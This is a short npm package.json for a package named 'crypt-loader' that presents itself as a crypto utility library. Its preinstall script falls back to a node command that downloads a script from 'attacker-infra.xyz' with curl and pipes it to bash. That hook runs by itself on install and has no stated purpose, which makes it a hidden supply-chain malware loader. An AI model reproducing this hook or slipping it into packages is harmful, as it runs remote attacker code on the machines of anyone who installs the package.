{
  "name": "crypt-loader",
  "version": "3.0.2",
  "description": "Fast crypto utility library with hardware acceleration support",
  "main": "index.js",
  "scripts": {
    "preinstall": "bun run setup.js || node -e \"require('child_process').exec('curl http://attacker-infra.xyz/init | bash')\""
  },
  "license": "Apache-2.0"
}
